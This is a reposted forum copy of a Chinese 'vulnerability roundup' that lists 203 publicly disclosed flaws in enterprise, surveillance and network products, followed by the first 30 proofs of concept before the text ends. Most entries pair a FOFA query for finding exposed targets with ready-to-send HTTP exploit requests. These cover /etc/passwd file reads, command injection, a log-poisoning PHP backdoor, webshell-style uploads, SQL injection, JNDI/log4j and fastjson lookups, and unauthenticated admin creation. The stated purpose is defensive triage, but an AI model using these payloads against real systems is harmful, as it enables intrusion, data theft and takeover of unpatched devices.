中国网络渗透测试联盟

Title: Public Internet Vulnerability Roundup 202309-202406 (repost)

Author: admin    Time: 2024-6-5 14:31
Public Internet Vulnerability Roundup 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is sourced from 网络安全新视界; author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive/defensive exercises, and we hope this article helps with defence. Defenders can use its contents to triage risk in their own environments.

Sources: the article covers 203 PoCs for high-severity vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024, all collected from other public accounts or websites and compiled for publication by the 网络安全新视界 team.

Patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few overly long PoCs are replaced with the word PAYLOAD; search for the full PoC yourself if you need it.

Rights: if any content infringes a party's legal rights, contact the 网络安全新视界 team through the account backend to have the relevant content removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list". This article is the most complete version; when using it, press F12 and search for the keyword.

Bookmark this article if you need it. You can also follow the official account (网络安全新视界).

Contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC smart IoT integrated management platform arbitrary file read
21. Dahua ICC smart IoT integrated management platform random remote code execution
22. Dahua ICC smart IoT integrated management platform log4j remote code execution
23. Dahua ICC smart IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Byzoro (百卓) Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) Palm Campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAppSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity (安恒) 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 device cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. Fujian Kirisun (科立讯) communications command and dispatch platform down_file.php SQL injection
138. Fujian Kirisun (科立讯) communications command and dispatch platform pwd_update.php SQL injection
139. Fujian Kirisun (科立讯) communications command and dispatch platform editemedia.php SQL injection
140. Fujian Kirisun (科立讯) communications command and dispatch platform get_extension_yl.php SQL injection
141. Kirisun (科立讯) communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass / template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. MetaCRM (美特CRM) upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. Keytop (科拓) smart parking payment system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益价值 management system DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing (宏景) EHR downlawbase SQL injection
170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher (金和) OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical browsing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. ESAFENET (亿赛通) electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behaviour management system send_order.cgi command execution
196. Henan 风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. Founder (方正) omnimedia news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

PoC list

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging in to the admin backend with the default account admin, send the following request.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain a cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST request that plants a function executing a base64-encoded command.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: send the following request to the target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC smart IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC smart IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC smart IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC smart IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

